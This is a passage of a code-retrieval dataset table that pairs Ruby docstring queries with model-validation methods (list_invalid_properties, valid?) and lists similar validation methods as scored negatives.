| query (string, 7–9.55k chars) | document (string, 10–363k chars) | metadata (dict) | negatives (list, 0–101 items) | negative_scores (list, 0–101 items) | document_score (string, 3–10 chars) | document_rank (102 distinct values) |
|---|---|---|---|---|---|---|
Show invalid properties with the reasons. Usually used together with valid?
|
def list_invalid_properties
  invalid_properties = Array.new
  invalid_properties
end
|
{
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
}
|
[
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n pattern = Regexp.new(/^$|^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$/)\n if !@uuid.nil? && @uuid !~ pattern\n invalid_properties.push(\"invalid value for \\\"uuid\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$/)\n if !@vdisk_id.nil? && @vdisk_id !~ pattern\n invalid_properties.push(\"invalid value for \\\"vdisk_id\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @style.nil?\n invalid_properties.push('invalid value for \"style\", style cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n if !@name.nil? && @name.to_s.length > 31\n invalid_properties.push('invalid value for \"name\", the character length must be smaller than or equal to 31.')\n end\n\n pattern = Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n if !@name.nil? && @name !~ pattern\n invalid_properties.push(\"invalid value for \\\"name\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@static_wwpn_address.nil? && @static_wwpn_address !~ pattern\n invalid_properties.push(\"invalid value for \\\"static_wwpn_address\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@wwpn.nil? && @wwpn !~ pattern\n invalid_properties.push(\"invalid value for \\\"wwpn\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @is_object_icon.nil?\n invalid_properties.push('invalid value for \"is_object_icon\", is_object_icon cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = Array.new\n if @input_currency.nil?\n invalid_properties.push('invalid value for \"input_currency\", input_currency cannot be nil.')\n end\n\n if @sender.nil?\n invalid_properties.push('invalid value for \"sender\", sender cannot be nil.')\n end\n\n if @recipients.nil?\n invalid_properties.push('invalid value for \"recipients\", recipients cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @index.nil?\n invalid_properties.push('invalid value for \"index\", index cannot be nil.')\n end\n\n if @orientation.nil?\n invalid_properties.push('invalid value for \"orientation\", orientation cannot be nil.')\n end\n\n if @size.nil?\n invalid_properties.push('invalid value for \"size\", size cannot be nil.')\n end\n\n if @type.nil?\n invalid_properties.push('invalid value for \"type\", type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @direction.nil?\n invalid_properties.push('invalid value for \"direction\", direction cannot be nil.')\n end\n\n if @shape.nil?\n invalid_properties.push('invalid value for \"shape\", shape cannot be nil.')\n end\n\n if @linear_angle.nil?\n invalid_properties.push('invalid value for \"linear_angle\", linear_angle cannot be nil.')\n end\n\n if @is_scaled.nil?\n invalid_properties.push('invalid value for \"is_scaled\", is_scaled cannot be nil.')\n end\n\n if @tile_flip.nil?\n invalid_properties.push('invalid value for \"tile_flip\", tile_flip cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = Array.new\n if @format.nil?\n invalid_properties.push('invalid value for \"format\", format cannot be nil.')\n end\n\n invalid_properties\n end"
] |
[
"0.76497203",
"0.76497203",
"0.76497203",
"0.76497203",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7356452",
"0.7334807",
"0.72685325",
"0.7238964",
"0.7231359",
"0.72258264",
"0.7208294",
"0.71760833"
] |
0.7170241
|
93
|
Check to see if all the properties in the model are valid
|
def valid?
  true
end
|
{
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
}
|
[
"def validate_properties\n true\n end",
"def validate_properties\n true\n end",
"def validate\n super\n\n check_optional_property :collection, String\n check_optional_property :create, String\n check_optional_property :delete, String\n check_optional_property :flush, String\n check_optional_property :prefetch, String\n check_optional_property :request_to_query, String\n check_optional_property :resource_to_request_patch, String\n check_optional_property :return_if_object, String\n check_optional_property :self_link, String\n end",
"def valid_attributes?\n true\n end",
"def valid_attributes?\n attribute_errors.empty?\n end",
"def valid?\n return false if @property_code.nil?\n return false if @property_name.nil?\n return false if @location.nil?\n return false if @total_price.nil?\n return false if @min_daily_rate.nil?\n return true\n end",
"def validate_presence_of(klazz, properties)\r\n instance = klazz.new \r\n instance.should_not be_valid\r\n \r\n properties.each do |property| \r\n instance.errors.should be_invalid(property)\r\n err_properties = instance.errors[property]\r\n if err_properties.is_a? Array\r\n err_properties.include?(ActiveRecord::Errors.default_error_messages[:blank]).should be_true\r\n else\r\n err_properties.should == ActiveRecord::Errors.default_error_messages[:blank] \r\n end\r\n end \r\n end",
"def validate_attributes!(attributes)\n invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys\n raise UndefinedPropertyError, \"Undefined properties: #{invalid_properties.join(',')}\" if invalid_properties.size > 0\n end",
"def model_valid?\n true\n end",
"def model_valid?\n true\n end",
"def valid?\n self.errors = []\n self.content_type.fields.each do |field|\n if field.required\n if self.dynamic_getter(field.name).blank?\n self.errors << field.name\n end\n end\n end\n self.errors.blank?\n end",
"def valid?\n validate\n @model.errors.on(:preferences).blank?\n end",
"def validate_properties\n if @properties.keys.count > 0\n if @properties.key?(:label)\n unless @properties[:label] =~ /^[a-zA-Z][\\w|\\s]*$/\n raise 'property label validation error'\n end\n end\n\n if @properties.key?(:default_aggregate)\n unless @properties[:default_aggregate] =~ /^max$|^min$|^avg$|^count$/i\n raise 'property default_aggregate validation error'\n end\n end\n end\n end",
"def validate_properties\n @properties.each do |property, values|\n valid_values = validate_values(property, values)\n\n if valid_values.is_a?(Array) && valid_values == [] || valid_values.nil?\n @properties.delete(property)\n else\n @properties[property] = valid_values\n end\n end\n end",
"def validate\n valid?\n end",
"def validate_attributes!(attributes)\n return attributes if attributes.blank?\n invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys\n invalid_properties.reject! { |name| self.respond_to?(\"#{name}=\") }\n fail UndefinedPropertyError, \"Undefined properties: #{invalid_properties.join(',')}\" if !invalid_properties.empty?\n end",
"def is_valid; end",
"def valid?\n # TODO validate nested objects\n output = super\n errors.empty? && output\n end",
"def property_checks\n errors.add(:base, \"You can't have a Thing without properties\") if property_keys.empty?\n\n self.property_keys.each do |key|\n errors.add(:properties, \"'#{key}' is an invalid property for this List\") unless available_property_keys.include?(key)\n end\n end",
"def valid_for_attributes( model, attributes )\n unless model.valid?\n errors = model.errors\n our_errors = Array.new\n errors.each { |attr,error|\n if attributes.include? attr\n our_errors << [attr,error]\n end\n }\n errors.clear\n our_errors.each { |attr,error| errors.add(attr,error) }\n return false unless errors.empty?\n end\n return true\n end",
"def valid?\n type_validator = EnumAttributeValidator.new('String', [\"person\", \"business\"])\n return false unless type_validator.valid?(@type)\n return false if @country.nil?\n return false if @street.nil?\n return false if @postal_code.nil?\n return false if @city.nil?\n return false if @email.nil?\n return false if @ip.nil?\n identification_type_validator = EnumAttributeValidator.new('String', [\"DL\", \"PP\", \"ID\", \"OT\"])\n return false unless identification_type_validator.valid?(@identification_type)\n legal_entity_type_validator = EnumAttributeValidator.new('String', [\"sole_proprietorship\", \"partnership\", \"privately_owned_company\", \"publicly_owned_company\", \"government_owned_entity\", \"trust\", \"ngo\", \"club_and_society\", \"go\", \"other\", \"financial_institution\", \"mto\"])\n return false unless legal_entity_type_validator.valid?(@legal_entity_type)\n nature_of_business_validator = EnumAttributeValidator.new('String', [\"personal\", \"agriculture_and_hunting\", \"forestry\", \"fishing\", \"agricultural_by_products\", \"coal_mining\", \"oil_mining\", \"iron_ore_mining\", \"other_metal_and_diamond_mining\", \"other_mineral_mining\", \"manufacturing_of_food_drink_tobacco\", \"manufacturing_of_textiles_leather_fur_furniture\", \"manufacture_of_wooden_products_furniture\", \"manufacture_of_paper_pulp_allied_products\", \"manufacture_of_chemicals_medical_petroleum_rubber_plastic_products\", \"manufacture_of_pottery_china_glass_stone\", \"manufacture_of_iron_steel_non_ferrous_metals_basic_industries\", \"manufacture_of_metal_products_electrical_and_scientific_engineering\", \"manufacture_of_jewelry_musical_instruments_toys\", \"electricity_gas_and_water\", \"construction\", \"wholesale_trade\", \"retail_trade\", \"catering_incl_hotels\", \"transport_storage\", \"communications\", \"finance_and_holding_companies\", \"insurance\", \"business_services\", \"real_estate_development_investment\", \"central_state_governments\", \"community_services_defence_police_prisons_etc\", \"social_services_education_health_care\", \"personal_services_leisure_services\", \"personal_services_domestic_laundry_repairs\", \"personal_services_embassies_international_organisations\"])\n return false unless nature_of_business_validator.valid?(@nature_of_business)\n return false if @documents.nil?\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\", \"O\"])\n return false unless gender_validator.valid?(@gender)\n true\n end",
"def valid?\n return false if !super\n return false if @index.nil?\n return false if @orientation.nil?\n orientation_validator = EnumAttributeValidator.new('String', ['Horizontal', 'Vertical'])\n return false unless orientation_validator.valid?(@orientation)\n return false if @size.nil?\n size_validator = EnumAttributeValidator.new('String', ['Full', 'Half', 'Quarter'])\n return false unless size_validator.valid?(@size)\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['Title', 'Body', 'CenteredTitle', 'Subtitle', 'DateAndTime', 'SlideNumber', 'Footer', 'Header', 'Object', 'Chart', 'Table', 'ClipArt', 'Diagram', 'Media', 'SlideImage', 'Picture'])\n return false unless type_validator.valid?(@type)\n true\n end",
"def validate\n validate_string_attributes\n @relations.map(&:validate)\n end",
"def is_valid?\n end",
"def run_validations\n true\n end",
"def validate\n validate_params\n validate_colour\n validate_coordinates\n validate_dimension\n end",
"def checkAttributeRequirements\n if @valid_attributes.empty?\n @error_text = \"No valid attributes found\"\n return false\n elsif (@mandatory_attributes_from_db & @valid_attributes) != @mandatory_attributes_from_db\n missing_attr = @mandatory_attributes_from_db - (@mandatory_attributes_from_db & @valid_attributes)\n\n x_attr_txt = \"\"\n missing_attr.each {|x_attr| x_attr_txt += x_attr[:name] + \", \"}\n @error_text = \"Mandatory attributes #{x_attr_txt[0..-3]} is/are missing\"\n return false\n end\n\n return true\n end",
"def validations\n {}\n end",
"def validatable?\n true\n end",
"def validate\n validate_params\n validate_coordinates\n validate_colour\n validate_dimension\n end",
"def validate_required\n [\n :project_name,\n :status,\n :requester_id,\n :subject_expert_id,\n :sponsor_id,\n :vision,\n :goal,\n :description,\n :scope,\n :advice_required,\n :program_id,\n :train_id,\n :funding_method,\n :cost_center,\n :funding_status,\n :budget_allocated,\n :priority,\n :start_date,\n :end_date,\n :risk_rating,\n :risks,\n :projected_revenue,\n ].each do |field|\n if self.attributes[field.to_s].nil? || self.attributes[field.to_s].blank?\n # intentionally vague!\n add_validation 'All fields are required to perform further validations'\n return false\n end\n end\n true\n end",
"def validate\n validate_root\n validate_associated\n valid?\n end",
"def validate\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @created.nil?\n return false if @modified.nil?\n return false if @company_name.nil?\n return false if @company_name.to_s.length < 1\n return false if @domain_name.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"active\", \"deactivated\"])\n return false unless state_validator.valid?(@state)\n return false if @billing_email.nil?\n return false if @application_count.nil?\n return false if @user_count.nil?\n return false if @campaigns_active_count.nil?\n return false if @campaigns_inactive_count.nil?\n true\n end",
"def valid?\n _errors_before = self.errors.dup\n _s = super\n validate_attributes\n _errors_before.each { |e| append_error(_errors_before,e) }\n self.errors.empty?\n end",
"def valid?\n true\n end",
"def validate!\n expected_props, required_props = @properties.keys, @required\n\n unless is_a?(Dialect) || is_a?(Template)\n expected_props = expected_props + INHERITED_PROPERTIES.keys\n end\n\n # It has only expected properties (exclude metadata)\n keys = self.keys - [:\"@context\"]\n keys = keys.reject {|k| k.to_s.include?(':')} unless is_a?(Dialect)\n raise \"#{type} has unexpected keys: #{keys - expected_props}\" unless keys.all? {|k| expected_props.include?(k)}\n\n # It has required properties\n raise \"#{type} missing required keys: #{required_props & keys}\" unless (required_props & keys) == required_props\n\n # Every property is valid\n keys.each do |key|\n value = self[key]\n is_valid = case key\n when :columns\n column_names = value.map(&:name)\n value.is_a?(Array) &&\n value.all? {|v| v.is_a?(Column) && v.validate!} &&\n begin\n # The name properties of the column descriptions must be unique within a given table description.\n column_names = value.map(&:name)\n raise \"Columns must have unique names\" if column_names.uniq != column_names\n true\n end\n when :commentPrefix then value.is_a?(String) && value.length == 1\n when :datatype then value.is_a?(String) && DATATYPES.keys.map(&:to_s).include?(value)\n when :default then value.is_a?(String)\n when :delimiter then value.is_a?(String) && value.length == 1\n when :dialect then value.is_a?(Dialect) && value.validate!\n when :doubleQuote then %w(true false 1 0).include?(value.to_s.downcase)\n when :encoding then Encoding.find(value)\n when :foreignKeys\n # An array of foreign key definitions that define how the values from specified columns within this table link to rows within this table or other tables. A foreign key definition is a JSON object with the properties:\n value.is_a?(Array) && value.all? do |fk|\n raise \"Foreign key must be an object\" unless fk.is_a?(Hash)\n columns, reference = fk['columns'], fk['reference']\n raise \"Foreign key missing columns and reference\" unless columns && reference\n raise \"Foreign key has extra entries\" unless fk.keys.length == 2\n raise \"Foreign key must reference columns\" unless Array(columns).all? {|k| self.columns.any? {|c| c.name == k}}\n raise \"Foreign key reference must be an Object\" unless reference.is_a?(Hash)\n\n if reference.has_key?('resource')\n raise \"Foreign key having a resource reference, must not have a schema\" if reference.has_key?('schema')\n # FIXME resource is a URL of a specific resource (table) which must exist\n elsif reference.has_key?('schema')\n # FIXME schema is a URL of a specific schema which must exist\n end\n # FIXME: columns\n true\n end\n when :format then value.is_a?(String)\n when :header then %w(true false 1 0).include?(value.to_s.downcase)\n when :headerColumnCount, :headerRowCount\n value.is_a?(Numeric) && value.integer? && value > 0\n when :length\n # Applications must raise an error if length, maxLength or minLength are specified and the cell value is not a list (ie separator is not specified), a string or one of its subtypes, or a binary value.\n raise \"Use if minLength or maxLength with length requires separator\" if self[:minLength] || self[:maxLength] && !self[:separator]\n raise \"Use of both length and minLength requires they be equal\" unless self.fetch(:minLength, value) == value\n raise \"Use of both length and maxLength requires they be equal\" unless self.fetch(:maxLength, value) == value\n value.is_a?(Numeric) && value.integer? 
&& value > 0\n when :language then BCP47::Language.identify(value)\n when :lineTerminator then value.is_a?(String)\n when :minimum, :maximum, :minInclusive, :maxInclusive, :minExclusive, :maxExclusive\n value.is_a?(Numeric) ||\n RDF::Literal::Date.new(value).valid? ||\n RDF::Literal::Time.new(value).valid? ||\n RDF::Literal::DateTime.new(value).valid?\n when :minLength, :maxLength\n value.is_a?(Numeric) && value.integer? && value > 0\n when :name then value.is_a?(String) && !name.start_with?(\"_\")\n when :notes then value.is_a?(Array) && value.all? {|v| v.is_a?(Hash)}\n when :null then value.is_a?(String)\n when :predicateUrl then Array(value).all? {|v| RDF::URI(v).valid?}\n when :primaryKey\n # A column reference property that holds either a single reference to a column description object or an array of references.\n Array(value).all? do |k|\n self.columns.any? {|c| c.name == k}\n end\n when :quoteChar then value.is_a?(String) && value.length == 1\n when :required then %w(true false 1 0).include?(value.to_s.downcase)\n when :resources then value.is_a?(Array) && value.all? {|v| v.is_a?(Table) && v.validate!}\n when :schema then value.is_a?(Schema) && value.validate!\n when :separator then value.nil? || value.is_a?(String) && value.length == 1\n when :skipInitialSpace then %w(true false 1 0).include?(value.to_s.downcase)\n when :skipBlankRows then %w(true false 1 0).include?(value.to_s.downcase)\n when :skipColumns then value.is_a?(Numeric) && value.integer? && value >= 0\n when :skipRows then value.is_a?(Numeric) && value.integer? && value >= 0\n when :source then %w(json rdf).include?(value)\n when :\"table-direction\" then %w(rtl ltr default).include?(value)\n when :targetFormat, :templateFormat then RDF::URI(value).valid?\n when :templates then value.is_a?(Array) && value.all? {|v| v.is_a?(Template) && v.validate!}\n when :\"text-direction\" then %w(rtl ltr).include?(value)\n when :title then valid_natural_language_property?(value)\n when :trim then %w(true false 1 0 start end).include?(value.to_s.downcase)\n when :urlTemplate then value.is_a?(String)\n when :@id then @id.valid?\n when :@type then value.to_sym == type\n else\n raise \"?!?! shouldn't get here for key #{key}\"\n end\n raise \"#{type} has invalid #{key}: #{value.inspect}\" unless is_valid\n end\n\n self\n end",
"def valid?\n return false if @subject_property.nil?\n return false if @proprietorship.nil?\n proprietorship_validator = EnumAttributeValidator.new('String', [\"Unknown\", \"Sole\", \"Joint\"])\n return false unless proprietorship_validator.valid?(@proprietorship)\n return false if @surname.nil?\n return false if @forename.nil?\n return false if @middle_name.nil?\n return true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless object_type_validator.valid?(@object_type)\n hardware_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless hardware_status_validator.valid?(@hardware_status)\n reason_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless reason_validator.valid?(@reason)\n software_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless software_status_validator.valid?(@software_status)\n status_validator = EnumAttributeValidator.new('String', [\"Incomplete\", \"Not-Found\", \"Not-Listed\", \"Validated\", \"Not-Evaluated\"])\n return false unless status_validator.valid?(@status)\n true && super\n end",
"def core_attributes_valid\n core_attributes = [@rateable, @rater, @ratee, @rating_type]\n return if core_attributes.all? { |atr| atr.present? && atr.valid? }\n errors.add('message', 'Not all core attributes present and valid.')\n end",
"def valid?\n super\n errors.empty?\n end",
"def valid?\n \n if @account_id.nil?\n false\n elsif @campaign_id.nil?\n false\n elsif @csp_id.nil?\n false\n elsif @status.nil?\n false\n elsif @create_date.nil?\n false\n elsif @auto_renewal.nil?\n false\n elsif @brand_id.nil?\n false\n elsif @usecase.nil?\n false\n elsif @sub_usecases.nil?\n false\n elsif @description.nil?\n false\n elsif @embedded_link.nil?\n false\n elsif @embedded_phone.nil?\n false\n elsif @affiliate_marketing.nil?\n false\n elsif @number_pool.nil?\n false\n elsif @age_gated.nil?\n false\n elsif @direct_lending.nil?\n false\n elsif @subscriber_optin.nil?\n false\n elsif @subscriber_optout.nil?\n false\n elsif @subscriber_help.nil?\n false\n elsif @sample1.nil?\n false\n elsif @mock.nil?\n false\n else\n list_invalid_properties.length() == 0\n end\n end",
"def valid?(metadata)\n validate.each do |attr|\n return false if metadata[attr.to_sym].nil? || metadata[attr.to_sym].zero?\n end\n end",
"def is_valid\n return true\n end",
"def validate_attrs\n @target.present? && !@target.errors.any? && @actor.present? && @action_key.present?\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n if !@name.nil? && @name.to_s.length > 31\n invalid_properties.push('invalid value for \"name\", the character length must be smaller than or equal to 31.')\n end\n\n pattern = Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n if !@name.nil? && @name !~ pattern\n invalid_properties.push(\"invalid value for \\\"name\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@static_wwpn_address.nil? && @static_wwpn_address !~ pattern\n invalid_properties.push(\"invalid value for \\\"static_wwpn_address\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@wwpn.nil? && @wwpn !~ pattern\n invalid_properties.push(\"invalid value for \\\"wwpn\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def valid_save?\n valid = true\n\n if self.name.nil? || self.name == \"\"\n valid = false\n end\n\n if self.general_info.nil? || self.general_info == \"\"\n valid = false\n end\n\n if self.technical_specs.nil? || self.technical_specs == \"\"\n valid = false\n end\n\n if self.where_to_buy.nil? || self.where_to_buy == \"\"\n valid = false\n end\n\n return valid\n end",
"def valid?\n schema.validate(self)\n end",
"def valid?\n reset_errors\n valid_date?\n valid_user?\n valid_activity_type?\n self.errors.empty?\n end",
"def valid?\n validate\n end",
"def product_attributes_must_not_be_empty\n\n\t\t# Instance\n\t\tproduct = Product.new\n\n\t\tassert product.invalid?\n\t\tassert product.errors[:title].any?\n\t\tassert product.errors[:description].any?\n\t\tassert product.errors[:price].any?\n\t\tassert product.errors[:image_url].any?\n\tend",
"def valid?\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^psc_[a-zA-Z0-9]+$/)\n carrier_validator = EnumAttributeValidator.new('String', [\"USPS\"])\n return false unless carrier_validator.valid?(@carrier)\n return false if !@front_template_id.nil? && @front_template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@back_template_id.nil? && @back_template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@front_template_version_id.nil? && @front_template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n return false if !@back_template_version_id.nil? && @back_template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n object_validator = EnumAttributeValidator.new('String', [\"postcard\"])\n return false unless object_validator.valid?(@object)\n return false if @url.nil?\n return false if @url !~ Regexp.new(/^https:\\/\\/(lob-assets|lob-assets-staging)\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if !@description.nil? && @description.to_s.length > 255\n true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"network.ElementSummary\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"network.ElementSummary\"])\n return false unless object_type_validator.valid?(@object_type)\n ethernet_switching_mode_validator = EnumAttributeValidator.new('String', [\"end-host\", \"switch\"])\n return false unless ethernet_switching_mode_validator.valid?(@ethernet_switching_mode)\n fc_switching_mode_validator = EnumAttributeValidator.new('String', [\"end-host\", \"switch\"])\n return false unless fc_switching_mode_validator.valid?(@fc_switching_mode)\n management_mode_validator = EnumAttributeValidator.new('String', [\"IntersightStandalone\", \"UCSM\", \"Intersight\"])\n return false unless management_mode_validator.valid?(@management_mode)\n thermal_validator = EnumAttributeValidator.new('String', [\"unknown\", \"ok\", \"upper-non-recoverable\", \"upper-critical\", \"upper-non-critical\", \"lower-non-critical\", \"lower-critical\", \"lower-non-recoverable\"])\n return false unless thermal_validator.valid?(@thermal)\n true && super\n end",
"def valid?\n\t\t\t\ttrue\n\t\t\tend",
"def validate\r\n validate! rescue false\r\n end",
"def validate\n validate_string_attributes\n end",
"def valid?\n self.errors = Mongomatic::Errors.new\n do_callback(:before_validate)\n check_required_fields\n validate\n do_callback(:after_validate)\n self.errors.empty?\n end",
"def valid\n @valid\n end",
"def valid_objects\n all_objects.select { |o| o.valid? }\n end",
"def valid?\n return false if @summary.nil?\n return false if @summary.to_s.length > 100\n record_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\"])\n return false unless record_type_validator.valid?(@record_type)\n return false if !@wbs_code.nil? && @wbs_code.to_s.length > 50\n return false if @company.nil?\n return false if !@site_name.nil? && @site_name.to_s.length > 50\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state_identifier.nil? && @state_identifier.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@contact_phone_number.nil? && @contact_phone_number.to_s.length > 20\n return false if !@contact_phone_extension.nil? && @contact_phone_extension.to_s.length > 15\n return false if !@contact_email_address.nil? && @contact_email_address.to_s.length > 250\n severity_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless severity_validator.valid?(@severity)\n impact_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless impact_validator.valid?(@impact)\n return false if !@external_x_ref.nil? && @external_x_ref.to_s.length > 100\n return false if !@po_number.nil? && @po_number.to_s.length > 50\n return false if !@automatic_email_cc.nil? && @automatic_email_cc.to_s.length > 1000\n sub_billing_method_validator = EnumAttributeValidator.new('String', [\"ActualRates\", \"FixedFee\", \"NotToExceed\", \"OverrideRate\"])\n return false unless sub_billing_method_validator.valid?(@sub_billing_method)\n knowledge_base_link_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\", \"KnowledgeBaseArticle\", \"Time\", \"Activity\"])\n return false unless knowledge_base_link_type_validator.valid?(@knowledge_base_link_type)\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n predecessor_type_validator = EnumAttributeValidator.new('String', [\"Ticket\", \"Phase\"])\n return false unless predecessor_type_validator.valid?(@predecessor_type)\n return true\n end",
"def validate!\n true\n end",
